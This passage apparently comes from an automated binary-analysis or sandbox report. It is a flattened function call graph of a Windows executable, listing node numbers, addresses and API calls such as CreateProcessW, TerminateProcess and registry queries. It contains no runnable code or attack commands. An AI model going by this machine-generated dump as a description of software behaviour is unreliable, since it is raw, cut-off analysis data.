106867->106824 106869 c39091 22 API calls 106868->106869 106870 c35ca3 106869->106870 106871 c39091 22 API calls 106870->106871 106872 c35cab 106871->106872 106934 c3764f 106872->106934 106875 c3764f 22 API calls 106876 c35cbb 106875->106876 106877 c39091 22 API calls 106876->106877 106878 c35cc6 106877->106878 106879 c501fb 22 API calls 106878->106879 106880 c33a8b 106879->106880 106881 c33768 106880->106881 106882 c33776 106881->106882 106883 c39091 22 API calls 106882->106883 106884 c33781 106883->106884 106885 c39091 22 API calls 106884->106885 106886 c3378c 106885->106886 106887 c39091 22 API calls 106886->106887 106888 c33797 106887->106888 106889 c39091 22 API calls 106888->106889 106890 c337a2 106889->106890 106891 c3764f 22 API calls 106890->106891 106892 c337ad 106891->106892 106893 c501fb 22 API calls 106892->106893 106894 c337b4 RegisterWindowMessageW 106893->106894 106894->106835 106896 c43e21 106895->106896 106902 c43dfd 106895->106902 106937 c50662 5 API calls __Init_thread_wait 106896->106937 106898 c43e2b 106898->106902 106938 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106898->106938 106900 c4a89b 106904 c43e0e 106900->106904 106940 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106900->106940 106902->106904 106939 c50662 5 API calls __Init_thread_wait 106902->106939 106904->106839 106906 c33816 106905->106906 106909 c73f08 106905->106909 106907 c501fb 22 API calls 106906->106907 106908 c3381e 106907->106908 106908->106841 106910->106850 106911->106852 106941 ca116e 6 API calls 106911->106941 106913 c39091 22 API calls 106912->106913 106914 c336ec 106913->106914 106915 c39091 22 API calls 106914->106915 106916 c336f4 106915->106916 106917 c39091 22 API calls 106916->106917 106918 c336b6 106917->106918 106918->106857 106920 c805ea 106919->106920 106923 c3b0eb _wcslen 106919->106923 106926 c399c5 106920->106926 106922 c805f3 106922->106922 106924 c501fb 22 API calls 106923->106924 106925 c3b101 __fread_nolock 106923->106925 106924->106925 106925->106862 106927 c399dc __fread_nolock 106926->106927 106928 c399d3 106926->106928 106927->106922 106928->106927 106930 c38f59 106928->106930 106931 c38f69 __fread_nolock 106930->106931 106932 c38f6c 106930->106932 106931->106927 106933 c501fb 22 API calls 106932->106933 106933->106931 106935 c39091 22 API calls 106934->106935 106936 c35cb3 106935->106936 106936->106875 106937->106898 106938->106902 106939->106900 106940->106904 106942 c838a6 106943 c3dd10 ISource 106942->106943 106944 c3e071 PeekMessageW 106943->106944 106945 c3dd67 GetInputState 106943->106945 106946 c3df35 106943->106946 106948 c82b64 TranslateAcceleratorW 106943->106948 106949 c3e0d3 TranslateMessage DispatchMessageW 106943->106949 106950 c3e0ef PeekMessageW 106943->106950 106951 c3df64 timeGetTime 106943->106951 106952 c3e10f Sleep 106943->106952 106953 c83a1a Sleep 106943->106953 106954 c82c80 timeGetTime 106943->106954 106972 c3e2b0 106943->106972 106979 c3f220 106943->106979 107001 c43a70 106943->107001 107029 c4f130 IsDialogMessageW GetClassLongW 106943->107029 107031 ca4341 22 API calls 106943->107031 107032 c3fe90 106943->107032 107058 ca3eb3 82 API calls __wsopen_s 106943->107058 106944->106943 106945->106943 106945->106944 106948->106943 106949->106950 106950->106943 106951->106943 106967 c3e120 106952->106967 106953->106967 107030 c4b1b7 23 API calls 106954->107030 106955 c4eda7 timeGetTime 106955->106967 106958 c83ab1 GetExitCodeProcess 106961 c83add CloseHandle 106958->106961 106962 c83ac7 WaitForSingleObject 106958->106962 106959 cc3099 GetForegroundWindow 106959->106967 106961->106967 106962->106943 106962->106961 106963 c838d7 106963->106946 106964 c83b4f Sleep 106964->106943 106967->106943 106967->106946 106967->106955 106967->106958 106967->106959 106967->106963 106967->106964 107059 c9f152 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 106967->107059 107060 c9dc3e 46 API calls 106967->107060 106973 c3e2cf 106972->106973 106974 c3e2e3 106972->106974 107061 c3d7c0 106973->107061 107086 ca3eb3 82 API calls __wsopen_s 106974->107086 106976 c3e2da 106976->106943 106978 c83e1b 106978->106978 106980 c3f260 106979->106980 106996 c3f32c ISource 106980->106996 107098 c50662 5 API calls __Init_thread_wait 106980->107098 106983 c84aa8 106985 c39091 22 API calls 106983->106985 106983->106996 106984 c39091 22 API calls 106984->106996 106988 c84ac2 106985->106988 107099 c504c3 29 API calls __onexit 106988->107099 106990 c84acc 107100 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106990->107100 106993 c3fe90 329 API calls 106993->106996 106995 ca3eb3 82 API calls 106995->106996 106996->106984 106996->106993 106996->106995 106997 c41d40 22 API calls 106996->106997 106998 c3f631 106996->106998 107093 c38fbd 106996->107093 107097 c4b909 329 API calls 106996->107097 107101 c50662 5 API calls __Init_thread_wait 106996->107101 107102 c504c3 29 API calls __onexit 106996->107102 107103 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106996->107103 107104 cb4fa8 102 API calls 106996->107104 107105 cb7082 329 API calls 106996->107105 106997->106996 106998->106943 107002 c43ad2 107001->107002 107003 c43cfa 107001->107003 107005 c43ade 107002->107005 107006 c88253 107002->107006 107127 c50662 5 API calls __Init_thread_wait 107003->107127 107009 c43de0 9 API calls 107005->107009 107133 cb785d 329 API calls 107006->107133 107008 c43d04 107008->107002 107128 c3c110 107008->107128 107010 c43aea 107009->107010 107107 c42fc0 107010->107107 107013 c43b0f 107014 c43de0 9 API calls 107013->107014 107025 c43caa 107013->107025 107015 c43b23 107014->107015 107017 c43de0 9 API calls 107015->107017 107018 c88263 107015->107018 107016 c43d22 107132 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 107016->107132 107021 c43b3c 107017->107021 107018->107025 107134 ca3eb3 82 API calls __wsopen_s 107018->107134 107021->107018 107022 c43bcd 107021->107022 107023 c43de0 9 API calls 107022->107023 107024 c43be0 107023->107024 107123 cbb2e7 107024->107123 107025->106943 107026 c43bfc ISource 107026->107025 107126 c4e156 22 API calls ISource 107026->107126 107029->106943 107030->106943 107031->106943 107033 c3fec5 107032->107033 107034 c415ea 107032->107034 107036 c501fb 22 API calls 107033->107036 107266 c50662 5 API calls __Init_thread_wait 107034->107266 107055 c3fefd ISource 107036->107055 107037 c415f4 107037->107033 107267 c504c3 29 API calls __onexit 107037->107267 107039 c4160e 107268 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 107039->107268 107041 c869eb 107272 ca3eb3 82 API calls __wsopen_s 107041->107272 107042 c501fb 22 API calls 107042->107055 107045 c8691c 107271 ca3eb3 82 API calls __wsopen_s 107045->107271 107048 c50662 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 107048->107055 107050 c3ffec ISource 107050->106943 107051 c39091 22 API calls 107051->107055 107052 c504c3 29 API calls pre_c_initialization 107052->107055 107053 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 107053->107055 107054 c8673e 107269 ca3eb3 82 API calls __wsopen_s 107054->107269 107055->107041 107055->107042 107055->107045 107055->107048 107055->107050 107055->107051 107055->107052 107055->107053 107055->107054 107057 c4066d ISource 107055->107057 107264 c41a30 329 API calls 2 library calls 107055->107264 107265 c3e530 41 API calls ISource 107055->107265 107270 ca3eb3 82 API calls __wsopen_s 107057->107270 107058->106943 107059->106967 107060->106967 107062 c3fe90 329 API calls 107061->107062 107071 c3d7fd 107062->107071 107064 c3d923 107069 c501fb 22 API calls 107064->107069 107076 c3d935 __fread_nolock 107064->107076 107065 c3d86b ISource 107065->106976 107066 c3db5f 107067 c82a5b 107066->107067 107068 c3db74 107066->107068 107092 ca3eb3 82 API calls __wsopen_s 107067->107092 107070 c501fb 22 API calls 107068->107070 107069->107076 107080 c3d9ca 107070->107080 107071->107064 107071->107065 107071->107067 107073 c501fb 22 API calls 107071->107073 107071->107076 107079 c3d989 ISource __fread_nolock 107071->107079 107072 c501fb 22 API calls 107074 c3d956 107072->107074 107073->107071 107074->107079 107087 c3ce70 329 API calls 107074->107087 107076->107065 107076->107072 107076->107074 107077 c82a4a 107091 ca3eb3 82 API calls __wsopen_s 107077->107091 107079->107066 107079->107077 107079->107080 107082 c82a25 107079->107082 107084 c82a03 107079->107084 107088 c3bbd8 329 API calls 107079->107088 107080->106976 107090 ca3eb3 82 API calls __wsopen_s 107082->107090 107089 ca3eb3 82 API calls __wsopen_s 107084->107089 107086->106978 107087->107079 107088->107079 107089->107080 107090->107080 107091->107080 107092->107065 107094 c38fc8 107093->107094 107095 c38ff7 107094->107095 107106 c3900b 40 API calls 107094->107106 107095->106996 107097->106996 107098->106983 107099->106990 107100->106996 107101->106996 107102->106996 107103->106996 107104->106996 107105->106996 107106->107095 107108 c87dff 107107->107108 107110 c42fec 107107->107110 107136 ca3eb3 82 API calls __wsopen_s 107108->107136 107111 c87e24 107110->107111 107117 c4302a __fread_nolock 107110->107117 107137 ca3eb3 82 API calls __wsopen_s 107111->107137 107113 c430fd 107113->107013 107115 c501fb 22 API calls 107115->107117 107116 c87e68 107138 c4e466 329 API calls 107116->107138 107117->107113 107117->107115 107117->107116 107119 c3fe90 329 API calls 107117->107119 107120 c87e7c 107117->107120 107122 c430ea 107117->107122 107119->107117 107120->107113 107139 ca3eb3 82 API calls __wsopen_s 107120->107139 107122->107113 107135 cb5f0e 54 API calls _wcslen 107122->107135 107140 cbb779 107123->107140 107126->107026 107127->107008 107129 c3c11f __fread_nolock _wcslen 107128->107129 107130 c501fb 22 API calls 107129->107130 107131 c3c15d 107130->107131 107131->107016 107132->107002 107133->107018 107134->107025 107135->107113 107136->107110 107137->107113 107138->107120 107139->107113 107141 cbb79d ___scrt_fastfail 107140->107141 107142 cbb7d8 107141->107142 107143 cbb814 107141->107143 107240 c3ce08 39 API calls 107142->107240 107148 cbb80b 107143->107148 107243 c3ce08 39 API calls 107143->107243 107145 cbb7e3 107145->107148 107241 c3ce08 39 API calls 107145->107241 107146 cbb86d 107219 c3c966 107146->107219 107148->107146 107245 c3ce08 39 API calls 107148->107245 107150 cbb825 107244 c3ce08 39 API calls 107150->107244 107153 cbb88b 107157 cbb958 107153->107157 107158 cbb89f 107153->107158 107155 cbb7f8 107242 c3ce08 39 API calls 107155->107242 107159 cbb98a GetCurrentDirectoryW 107157->107159 107163 c3c966 53 API calls 107157->107163 107160 c3c966 53 API calls 107158->107160 107247 c5022b 107159->107247 107162 cbb8b0 107160->107162 107166 c3c966 53 API calls 107162->107166 107169 cbb96f _wcslen 107163->107169 107165 cbb9bc 107167 cbb9f5 107165->107167 107248 c3600d 22 API calls 107165->107248 107168 cbb8cb 107166->107168 107174 cbba0b 107167->107174 107175 cbba07 107167->107175 107173 c3c966 53 API calls 107168->107173 107169->107159 107169->107167 107171 cbb9d5 107249 c3600d 22 API calls 107171->107249 107186 cbb8e6 107173->107186 107251 ca101a 10 API calls 107174->107251 107179 cbbb1a CreateProcessW 107175->107179 107180 cbba78 107175->107180 107176 cbb9e5 107250 c3600d 22 API calls 107176->107250 107178 cbba14 107252 ca0f40 10 API calls 107178->107252 107198 cbbaaf _wcslen 107179->107198 107254 c91a42 17 API calls 107180->107254 107184 cbba2a 107253 ca0e01 8 API calls 107184->107253 107185 cbba7d 107190 cbbaaa 107185->107190 107191 cbbaa3 107185->107191 107187 cbb926 GetSystemDirectoryW 107186->107187 107192 c3c966 53 API calls 107186->107192 107246 c5022b 107187->107246 107256 c91d48 6 API calls 107190->107256 107255 c91a7b 128 API calls 2 library calls 107191->107255 107201 cbb907 _wcslen 107192->107201 107193 cbba50 107193->107175 107197 cbbaa8 107197->107198 107199 cbbbaf CloseHandle 107198->107199 107200 cbbb56 GetLastError 107198->107200 107202 cbbbbf 107199->107202 107209 cbbc1a 107199->107209 107214 cbbb9a 107200->107214 107201->107165 107201->107187 107203 cbbbd1 107202->107203 107204 cbbbc6 CloseHandle 107202->107204 107206 cbbbd8 CloseHandle 107203->107206 107207 cbbbe3 107203->107207 107204->107203 107206->107207 107210 cbbbea CloseHandle 107207->107210 107211 cbbbf5 107207->107211 107208 cbbc26 107208->107214 107209->107208 107215 cbbc52 CloseHandle 107209->107215 107210->107211 107257 ca121d 34 API calls 107211->107257 107259 ca09d9 6 API calls 107214->107259 107215->107214 107216 cbb2f9 107216->107026 107217 cbbc06 107258 cbbcb6 25 API calls 107217->107258 107220 c3c97b 107219->107220 107221 c3c978 107219->107221 107222 c3c983 107220->107222 107223 c3c9b1 107220->107223 107221->107153 107260 c555e6 26 API calls 107222->107260 107225 c81283 107223->107225 107228 c3c9c3 107223->107228 107235 c8119c 107223->107235 107263 c555a3 26 API calls 107225->107263 107226 c3c993 107232 c501fb 22 API calls 107226->107232 107261 c4fefb 51 API calls 107228->107261 107229 c8129b 107229->107229 107233 c3c99d 107232->107233 107234 c3c110 22 API calls 107233->107234 107234->107221 107236 c501fb 22 API calls 107235->107236 107239 c81215 107235->107239 107237 c8120c 107236->107237 107238 c3c110 22 API calls 107237->107238 107238->107239 107262 c4fefb 51 API calls 107239->107262 107240->107145 107241->107155 107242->107148 107243->107150 107244->107148 107245->107146 107248->107171 107249->107176 107250->107167 107251->107178 107252->107184 107253->107193 107254->107185 107255->107197 107256->107198 107257->107217 107258->107209 107259->107216 107260->107226 107261->107226 107262->107225 107263->107229 107264->107055 107265->107055 107266->107037 107267->107039 107268->107033 107269->107057 107270->107050 107271->107050 107272->107050 107273 c31033 107278 c35d2d 107273->107278 107277 c31042 107279 c39091 22 API calls 107278->107279 107280 c35d9b 107279->107280 107287 c3526e 107280->107287 107282 c74c0f 107284 c35e38 107284->107282 107285 c31038 107284->107285 107290 c35f26 22 API calls __fread_nolock 107284->107290 107286 c504c3 29 API calls __onexit 107285->107286 107286->107277 107291 c3529a 107287->107291 107290->107284 107292 c3528d 107291->107292 107293 c352a7 107291->107293 107292->107284 107293->107292 107294 c352ae RegOpenKeyExW 107293->107294 107294->107292 107295 c352c8 RegQueryValueExW 107294->107295 107296 c352e9 107295->107296 107297 c352fe RegCloseKey 107295->107297 107296->107297 107297->107292 107298 c85c7e 107336 c40b05 ISource __fread_nolock 107298->107336 107299 c869eb 107382 ca3eb3 82 API calls __wsopen_s 107299->107382 107300 c501fb 22 API calls 107322 c3ff43 ISource 107300->107322 107304 c8691c 107381 ca3eb3 82 API calls __wsopen_s 107304->107381 107307 c43de0 9 API calls 107307->107336 107311 c3c110 22 API calls 107311->107336 107313 c3ffec ISource 107314 c50662 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 107314->107322 107316 c39091 22 API calls 107316->107322 107317 c867f3 107375 ca3eb3 82 API calls __wsopen_s 107317->107375 107318 c504c3 29 API calls pre_c_initialization 107318->107322 107322->107299 107322->107300 107322->107304 107322->107313 107322->107314 107322->107316 107322->107318 107323 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 107322->107323 107324 c8673e 107322->107324 107329 c4066d ISource 107322->107329 107366 c41a30 329 API calls 2 library calls 107322->107366 107367 c3e530 41 API calls ISource 107322->107367 107323->107322 107374 ca3eb3 82 API calls __wsopen_s 107324->107374 107325 c86806 107379 c977e9 22 API calls 107325->107379 107327 c501fb 22 API calls 107327->107336 107328 c86814 107376 ca3eb3 82 API calls __wsopen_s 107328->107376 107380 ca3eb3 82 API calls __wsopen_s 107329->107380 107331 c86826 107377 c977e9 22 API calls 107331->107377 107334 c3fe90 329 API calls 107334->107336 107335 c85c08 107378 ca3eb3 82 API calls __wsopen_s 107335->107378 107336->107307 107336->107311 107336->107313 107336->107317 107336->107322 107336->107325 107336->107327 107336->107328 107336->107334 107336->107335 107341 cb9cfd 107336->107341 107344 caf733 107336->107344 107352 caf932 107336->107352 107361 ca6571 107336->107361 107368 c4e466 329 API calls 107336->107368 107369 ca19e6 22 API calls 107336->107369 107370 c50662 5 API calls __Init_thread_wait 107336->107370 107371 c50618 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 107336->107371 107372 cb785d 329 API calls 107336->107372 107373 c977e9 22 API calls 107336->107373 107383 cb86cb 107341->107383 107343 cb9d0d 107343->107336 107345 caf744 107344->107345 107502 c33172 107345->107502 107348 c3c966 53 API calls 107349 caf765 GetEnvironmentVariableW 107348->107349 107505 ca14e1 22 API calls 107349->107505 107351 caf782 ISource 107351->107336 107353 c3c966 53 API calls 107352->107353 107354 caf96c 107353->107354 107506 c38600 107354->107506 107356 caf97c 107357 caf9a1 107356->107357 107358 c3fe90 329 API calls 107356->107358 107360 caf9a5 107357->107360 107531 c3600d 22 API calls 107357->107531 107358->107357 107360->107336 107362 c3c966 53 API calls 107361->107362 107363 ca6584 107362->107363 107558 c9e334 GetFileAttributesW 107363->107558 107365 ca658e 107365->107336 107366->107322 107367->107322 107368->107336 107369->107336 107370->107336 107371->107336 107372->107336 107373->107336 107374->107329 107375->107325 107376->107331 107377->107313 107378->107325 107379->107313 107380->107313 107381->107313 107382->107313 107384 c3c966 53 API calls 107383->107384 107385 cb8702 107384->107385 107404 cb8747 ISource 107385->107404 107420 cb9445 107385->107420 107387 cb89f3 107388 cb8bc1 107387->107388 107393 cb8a01 107387->107393 107465 cb9656 60 API calls 107388->107465 107391 cb8bd0 107392 cb8bdc 107391->107392 107391->107393 107392->107404 107433 cb85f8 107393->107433 107394 c3c966 53 API calls 107412 cb87bb 107394->107412 107399 cb8a3a 107446 c50090 107399->107446 107402 cb8a5a 107452 ca3eb3 82 API calls __wsopen_s 107402->107452 107403 cb8a74 107453 c348fb 107403->107453 107404->107343 107407 cb8a65 GetCurrentProcess TerminateProcess 107407->107403 107410 cb8a9c 107419 cb8ac4 107410->107419 107462 c41d40 22 API calls 107410->107462 107412->107387 107412->107394 107412->107404 107450 c94991 22 API calls __fread_nolock 107412->107450 107451 cb8c8f 42 API calls _strftime 107412->107451 107413 cb8c37 107413->107404 107415 cb8c4b FreeLibrary 107413->107415 107414 cb8ab3 107463 cb92ed 75 API calls 107414->107463 107415->107404 107419->107413 107464 c41d40 22 API calls 107419->107464 107466 cb92ed 75 API calls 107419->107466 107421 c38f59 22 API calls 107420->107421 107422 cb9460 CharLowerBuffW 107421->107422 107467 c99670 107422->107467 107426 c39091 22 API calls 107427 cb949c 107426->107427 107474 c3b26f 107427->107474 107429 cb94b0 107430 c399c5 22 API calls 107429->107430 107432 cb94ba _wcslen 107430->107432 107431 cb95d0 _wcslen 107431->107412 107432->107431 107482 cb8c8f 42 API calls _strftime 107432->107482 107434 cb865e 107433->107434 107435 cb8613 107433->107435 107437 cb9808 107434->107437 107435->107434 107436 c501fb 22 API calls 107435->107436 107436->107435 107438 cb9a1d ISource 107437->107438 107445 cb982c _strcat _wcslen 107437->107445 107438->107399 107439 c3cc33 39 API calls 107439->107445 107440 c3ce08 39 API calls 107440->107445 107441 c3d6cc 39 API calls 107441->107445 107442 c5ee2c 21 API calls ___std_exception_copy 107442->107445 107443 c3c966 53 API calls 107443->107445 107445->107438 107445->107439 107445->107440 107445->107441 107445->107442 107445->107443 107485 c9f785 WideCharToMultiByte WideCharToMultiByte _wcslen 107445->107485 107447 c500a5 107446->107447 107448 c5013d Sleep 107447->107448 107449 c5010b 107447->107449 107448->107449 107449->107402 107449->107403 107450->107412 107451->107412 107452->107407 107454 c34903 107453->107454 107455 c501fb 22 API calls 107454->107455 107456 c34911 107455->107456 107486 c34945 107456->107486 107459 c347f0 107489 c43900 107459->107489 107461 c34800 107461->107410 107462->107414 107463->107419 107464->107419 107465->107391 107466->107419 107468 c99690 _wcslen 107467->107468 107469 c9977f 107468->107469 107471 c996c5 107468->107471 107473 c99784 107468->107473 107469->107426 107469->107432 107471->107469 107483 c4e19f 41 API calls 107471->107483 107473->107469 107484 c4e19f 41 API calls 107473->107484 107475 c3b2db 107474->107475 107476 c3b27e 107474->107476 107477 c399c5 22 API calls 107475->107477 107476->107475 107479 c3b289 107476->107479 107478 c3b2a4 __fread_nolock 107477->107478 107478->107429 107479->107478 107480 c501fb 22 API calls 107479->107480 107481 c80662 107480->107481 107482->107431 107483->107471 107484->107473 107485->107445 107487 c501fb 22 API calls 107486->107487 107488 c34919 107487->107488 107488->107459 107490 c4390b 107489->107490 107491 c881aa 107490->107491 107496 c43913 ISource 107490->107496 107492 c501fb 22 API calls 107491->107492 107494 c881b6 107492->107494 107493 c4391a 107493->107461 107494->107494 107496->107493 107497 c43980 107496->107497 107498 c4398b ISource 107497->107498 107500 c439c6 ISource 107498->107500 107501 c4e156 22 API calls ISource 107498->107501 107500->107496 107501->107500 107503 c501fb 22 API calls 107502->107503 107504 c33184 107503->107504 107504->107348 107505->107351 107532 c3791d 107506->107532 107508 c38742 107509 c38c8d 22 API calls 107508->107509 107511 c3875c 107509->107511 107511->107356 107513 c768e9 107552 c99eb9 84 API calls __wsopen_s 107513->107552 107514 c767ba 107522 c501fb 22 API calls 107514->107522 107516 c388a6 107553 c99eb9 84 API calls __wsopen_s 107516->107553 107517 c38c8d 22 API calls 107524 c38625 __fread_nolock 107517->107524 107519 c38e3b 22 API calls 107519->107524 107521 c768f7 107523 c38c8d 22 API calls 107521->107523 107526 c767da __fread_nolock 107522->107526 107525 c7690d 107523->107525 107524->107508 107524->107513 107524->107514 107524->107516 107524->107517 107524->107519 107524->107526 107527 c38deb 22 API calls 107524->107527 107528 c38f59 22 API calls 107524->107528 107536 c39269 107524->107536 107550 c3c684 23 API calls __fread_nolock 107524->107550 107551 c3afe0 22 API calls __fread_nolock 107524->107551 107525->107511 107526->107516 107527->107524 107529 c38855 CharUpperBuffW 107528->107529 107530 c38deb 22 API calls 107529->107530 107530->107524 107531->107360 107533 c37942 107532->107533 107534 c501fb 22 API calls 107533->107534 107535 c37950 107534->107535 107535->107524 107537 c39297 107536->107537 107538 c38e3b 22 API calls 107537->107538 107547 c39344 107537->107547 107539 c392a1 107538->107539 107540 c393c7 107539->107540 107542 c392b3 107539->107542 107540->107547 107556 c3afe0 22 API calls __fread_nolock 107540->107556 107543 c39329 107542->107543 107548 c3945c _wcslen 107542->107548 107554 c3afe0 22 API calls __fread_nolock 107542->107554 107545 c3933a 107543->107545 107543->107547 107543->107548 107555 c5671b 39 API calls 107545->107555 107547->107524 107548->107547 107557 c5d385 39 API calls 107548->107557 107550->107524 107551->107524 107552->107521 107553->107511 107554->107542 107555->107547 107556->107540 107557->107547 107559 c9e360 107558->107559 107560 c9e34f FindFirstFileW 107558->107560 107559->107365 107560->107559 107561 c9e364 FindClose 107560->107561 107561->107559 107562 c8781f 107563 c87827 107562->107563 107564 c42305 107562->107564 107605 c9793c 22 API calls __fread_nolock 107563->107605 107568 c501fb 22 API calls 107564->107568 107573 c8789e 107564->107573 107566 c87839 107606 c978b5 22 API calls __fread_nolock 107566->107606 107570 c42359 107568->107570 107569 c87863 107571 c3fe90 329 API calls 107569->107571 107590 c4c103 107570->107590 107572 c8788a 107571->107572 107572->107573 107607 cb5f0e 54 API calls _wcslen 107572->107607 107577 c501fb 22 API calls 107583 c4243e ISource 107577->107583 107578 c878bb 107578->107564 107608 c9793c 22 API calls __fread_nolock 107578->107608 107580 c4a8c3 22 API calls 107588 c4277c ISource 107580->107588 107582 c87cd3 107609 c95566 22 API calls ISource 107582->107609 107583->107582 107585 c87cee 107583->107585 107587 c426e1 ISource 107583->107587 107596 c4a8c3 107583->107596 107587->107580 107587->107588 107589 c42793 107588->107589 107604 c4e13e 22 API calls ISource 107588->107604 107595 c4c113 107590->107595 107591 c42383 107591->107577 107592 c501fb 22 API calls 107592->107595 107593 c39091 22 API calls 107593->107595 107594 c4c103 22 API calls 107594->107595 107595->107591 107595->107592 107595->107593 107595->107594 107597 c4a8d1 107596->107597 107601 c4a8f9 ISource 107596->107601 107598 c4a8df 107597->107598 107599 c4a8c3 22 API calls 107597->107599 107600 c4a8e5 107598->107600 107602 c4a8c3 22 API calls 107598->107602 107599->107598 107600->107601 107603 c43980 22 API calls 107600->107603 107601->107583 107602->107600 107603->107601 107604->107588 107605->107566 107606->107569 107607->107578 107608->107578 107609->107585 107610 c3105b 107615 c34e52 107610->107615 107612 c3106a 107644 c504c3 29 API calls __onexit 107612->107644 107614 c31074 107616 c34e62 __wsopen_s 107615->107616 107617 c39091 22 API calls 107616->107617 107618 c34f18 107617->107618 107645 c34ff8 107618->107645 107620 c34f21 107652 c34b95 107620->107652 107627 c39091 22 API calls 107628 c34f52 107627->107628 107629 c38e3b 22 API calls 107628->107629 107630 c34f5b RegOpenKeyExW 107629->107630 107631 c748c1 RegQueryValueExW 107630->107631 107634 c34f7d 107630->107634 107632 c74957 RegCloseKey 107631->107632 107633 c748de 107631->107633 107632->107634 107643 c74969 _wcslen 107632->107643 107635 c33172 22 API calls 107633->107635 107634->107612 107636 c74902 RegQueryValueExW 107635->107636 107637 c7491f 107636->107637 107640 c74939 ISource 107636->107640 107638 c3b0db 22 API calls 107637->107638 107638->107640 107639 c378f9 22 API calls 107639->107643 107640->107632 107641 c3c110 22 API calls 107641->107643 107642 c35e8e 22 API calls 107642->107643 107643->107634 107643->107639 107643->107641 107643->107642 107644->107614 107669 c72370 107645->107669 107648 c3c110 22 API calls 107649 c3502b 107648->107649 107671 c350f7 107649->107671 107651 c35035 107651->107620 107653 c72370 __wsopen_s 107652->107653 107654 c34ba2 GetFullPathNameW 107653->107654 107655 c34bc4 107654->107655 107656 c3b0db 22 API calls 107655->107656 107657 c34be2 107656->107657 107658 c34dcb 107657->107658 107659 c74806 107658->107659 107660 c34de2 107658->107660 107662 c501fb 22 API calls 107659->107662 107685 c34df3 107660->107685 107664 c74810 __fread_nolock _wcslen 107662->107664 107663 c34ded 107665 c35e8e 107663->107665 107666 c35e9d __fread_nolock 107665->107666 107667 c501fb 22 API calls 107666->107667 107668 c34f49 107667->107668 107668->107627 107670 c35005 GetModuleFileNameW 107669->107670 107670->107648 107672 c72370 __wsopen_s 107671->107672 107673 c35104 GetFullPathNameW 107672->107673 107674 c35123 107673->107674 107675 c3513e 107673->107675 107677 c3b0db 22 API calls 107674->107677 107676 c38e3b 22 API calls 107675->107676 107678 c3512f 107676->107678 107677->107678 107681 c33249 107678->107681 107682 c33257 107681->107682 107683 c399c5 22 API calls 107682->107683 107684 c3326b 107683->107684 107684->107651 107686 c34e03 _wcslen 107685->107686 107687 c501fb 22 API calls 107686->107687 107689 c34e16 __fread_nolock 107686->107689 107688 c74872 __fread_nolock 107687->107688 107689->107663 107690 c6cedc 107691 c6ceee 107690->107691 107692 c6cee5 107690->107692 107694 c6cddb 107692->107694 107714 c63194 GetLastError 107694->107714 107696 c6cde8 107735 c6cefa 107696->107735 107698 c6cdf0 107744 c6cb6f 107698->107744 107705 c6ce3d 107707 c6ce45 107705->107707 107710 c6ce62 107705->107710 107706 c6ce07 107706->107691 107759 c62c38 20 API calls _abort 107707->107759 107709 c6ce8e 107713 c6ce4a 107709->107713 107766 c6ca45 26 API calls 107709->107766 107710->107709 107711 c62de8 _free 20 API calls 107710->107711 107711->107709 107760 c62de8 107713->107760 107715 c631b6 107714->107715 107716 c631aa 107714->107716 107768 c6509d 20 API calls 2 library calls 107715->107768 107767 c6362e 11 API calls 2 library calls 107716->107767 107719 c631b0 107719->107715 107721 c631ff SetLastError 107719->107721 107720 c631c2 107722 c631ca 107720->107722 107769 c63684 11 API calls 2 library calls 107720->107769 107721->107696 107725 c62de8 _free 20 API calls 107722->107725 107724 c631df 107724->107722 107726 c631e6 107724->107726 107727 c631d0 107725->107727 107770 c63006 20 API calls _abort 107726->107770 107729 c6320b SetLastError 107727->107729 107771 c62cc3 38 API calls _abort 107729->107771 107730 c631f1 107732 c62de8 _free 20 API calls 107730->107732 107734 c631f8 107732->107734 107734->107721 107734->107729 107736 c6cf06 ___BuildCatchObject 107735->107736 107737 c63194 _abort 38 API calls 107736->107737 107739 c6cf10 107737->107739 107740 c6cf94 __fread_nolock 107739->107740 107743 c62de8 _free 20 API calls 107739->107743 107772 c62cc3 38 API calls _abort 107739->107772 107773 c6337e EnterCriticalSection 107739->107773 107774 c6cf8b LeaveCriticalSection _abort 107739->107774 107740->107698 107743->107739 107775 c54dc5 107744->107775 107747 c6cba2 107749 c6cbb9 107747->107749 107750 c6cba7 GetACP 107747->107750 107748 c6cb90 GetOEMCP 107748->107749 107749->107706 107751 c63c40 107749->107751 107750->107749 107752 c63c7e 107751->107752 107753 c63c4e _abort 107751->107753 107786 c62c38 20 API calls _abort 107752->107786 107753->107752 107754 c63c69 RtlAllocateHeap 107753->107754 107785 c552cd 7 API calls 2 library calls 107753->107785 107754->107753 107756 c63c7c 107754->107756 107756->107713 107758 c6cf9c 51 API calls 2 library calls 107756->107758 107758->107705 107759->107713 107761 c62df3 RtlFreeHeap 107760->107761 107765 c62e1c __dosmaperr 107760->107765 107762 c62e08 107761->107762 107761->107765 107787 c62c38 20 API calls _abort 107762->107787 107764 c62e0e GetLastError 107764->107765 107765->107706 107766->107713 107767->107719 107768->107720 107769->107724 107770->107730 107773->107739 107774->107739 107776 c54de2 107775->107776 107777 c54dd8 107775->107777 107776->107777 107778 c63194 _abort 38 API calls 107776->107778 107777->107747 107777->107748 107779 c54e03 107778->107779 107783 c632e3 38 API calls __cftof 107779->107783 107781 c54e1c 107784 c63310 38 API calls __cftof 107781->107784 107783->107781 107784->107777 107785->107753 107786->107756 107787->107764 107788 c31098 107793 c329a4 107788->107793 107792 c310a7 107794 c39091 22 API calls 107793->107794 107795 c329bb GetVersionExW 107794->107795 107796 c3b0db 22 API calls 107795->107796 107797 c32a08 107796->107797 107798 c399c5 22 API calls 107797->107798 107808 c32a3e 107797->107808 107799 c32a32 107798->107799 107801 c33249 22 API calls 107799->107801 107800 c32ae3 GetCurrentProcess IsWow64Process 107802 c32aff 107800->107802 107801->107808 107803 c32b17 LoadLibraryA 107802->107803 107804 c738ae 